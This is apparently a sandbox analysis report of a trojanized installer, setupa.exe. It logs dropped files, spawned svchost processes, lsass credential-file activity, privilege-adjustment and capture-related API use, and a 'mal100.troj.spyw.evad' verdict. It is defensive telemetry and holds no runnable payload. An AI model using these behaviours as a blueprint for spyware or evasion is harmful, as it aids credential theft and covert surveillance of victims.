Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Windows\System32\lsass.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689727528
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896460C3
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964230B
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964430E
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896449C6
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689641D57
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689647C75
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689641866
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896434B8
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896470A9
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689645894
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68971B46C
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689645F15
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964277A
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689644953
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642A59
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964522C
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896451FF
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689647D92
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642176
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896469A6
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689644552
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689644188
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642AF9
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642356
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964497B
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689641B81
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896410F0
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964471E
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689647040
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689644142
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964648D
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964470A
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF68964153C
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689642707
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC7B00
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFD0628
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC8D78
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFCACAC
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC3BC4
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFCCB8C
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC8F84
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFCC760
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C294E9
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C304F1
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C3248D
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C31671
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C30A35
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_00C30F79
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0A97F9
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0ADEE6
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0B4D20
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0AFB55
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0AA2D0
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_6E0B51CE
Source: C:\Program Files\upupoo-classicshell.exe | Code function: 3_2_1000D0A1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02592E81
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0258B75E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02591F4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0259131F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02591870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_025824B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02590DCE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF6CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF6F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF24B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0DE40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0D8EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF8950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0EA6D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0FA4F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E083D1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04E0E391
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A1123D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A01E7D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A1079B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A10CEC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A1A02E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A1284E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_02A0B12B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C8F40E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C87D90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C8DD50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C7665F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C71E6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C8D7FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C768EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C8D2AE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04C7830F
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: 11_2_1000D0A1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F72E81
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F6B75E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F71F4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F7131F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F624B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F71870
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02F70DCE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B6CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B6F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B24B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052CDE40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B8950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052CD8EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052CE391
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052C83D1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052CEA6D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052CFA4F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02ED1E7D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EE123D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EE079B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EE0CEC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EE284E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EEA02E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_02EDB12B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0514DD50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_05147D90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0514F40E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0514D7FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0513665F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_05131E6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_051368EF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0513830F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0514D2AE
Source: C:\Program Files\upupoo-classicshell.exe | Code function: String function: 00C26684 appears 36 times
Source: C:\Program Files\upupoo-classicshell.exe | Code function: String function: 10004100 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 04E04350 appears 32 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 05143D0F appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 04C83D0F appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 052C4350 appears 32 times
Source: C:\Users\user\Desktop\setupa.exe | Code function: String function: 00007FF68964681B appears 37 times
Source: C:\Users\user\Desktop\setupa.exe | Code function: String function: 00007FF6897A8138 appears 55 times
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Code function: String function: 10004100 appears 31 times
Source: C:\Program Files\upupoo-classicshell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
Source: setupa.exe, 00000000.00000002.2202710108.000001F5DCDD4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameupupoo-classicshell.exe< vs setupa.exe
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@12/41@1/2
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF689647D83 FormatMessageA,GetLastError,LocalFree
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF7670 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF7790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF7BC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B7790 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B7670 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_052B7BC0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF6CA0 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf
Source: C:\Windows\System32\lsass.exe | Code function: 1_2_00000140ADFC0286 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,CloseHandle
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_04DF66E0 CoInitialize,CoCreateInstance,SysFreeString,SysFreeString,CoUninitialize
Source: C:\Users\user\Desktop\setupa.exe | Code function: 0_2_00007FF6896414D8 GetModuleHandleA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,FindResourceA,FindResourceExA,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\setupa.exe | File created: C:\Program Files\ClassicStartMenuDLL.dll
Source: C:\Windows\System32\lsass.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\e481ff35-c61f-4b35-b72d-22da10d15209
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\2024. 9.23
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1308
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5696
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\b4682187-afd5-4594-b3e6-e0a5103deabd
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: user32.dll | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -startup | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: Tsn | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -autorun | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: WinVersion | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -upgrade | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: runas | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: AutoStart | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: AutoStartDelay | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: %s%s | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: .dll | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -runas | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: PDGu | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -togglenew | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -toggle | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -open | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -settings | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -exit | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -reloadsettings | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: -nohook | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: Default | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: Progman | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: StartHookWindow | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: Shell_TrayWnd | 3_2_00C21CE0
Source: C:\Program Files\upupoo-classicshell.exe | Command line argument: TaskbarCreated | 3_2_00C21CE0
Source: setupa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\setupa.exe | File read: C:\Program Files\desktop.ini
Source: C:\Users\user\Desktop\setupa.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setupa.exe | Virustotal: Detection: 11%
Source: upupoo-classicshell.exe | String found in binary or memory: -startup
Source: unknown | Process created: C:\Users\user\Desktop\setupa.exe "C:\Users\user\Desktop\setupa.exe"
Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\setupa.exe | Process created: C:\Program Files\upupoo-classicshell.exe "C:\Program Files\upupoo-classicshell.exe"
Source: C:\Program Files\upupoo-classicshell.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Program Files\upupoo-classicshell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 480
Source: C:\Windows\System32\lsass.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Windows\System32\lsass.exe | Process created: C:\Users\Public\Documents\upupoo-classicshell.exe "C:\Users\Public\Documents\upupoo-classicshell.exe"
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: C:\Users\Public\Documents\upupoo-classicshell.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 488
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\setupa.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\setupa.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: ngcpopkeysrv.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: pcpksp.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeSection loaded: classicstartmenudll.dllJump to behavior
                      Source: C:\Program Files\upupoo-classicshell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dinput8.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
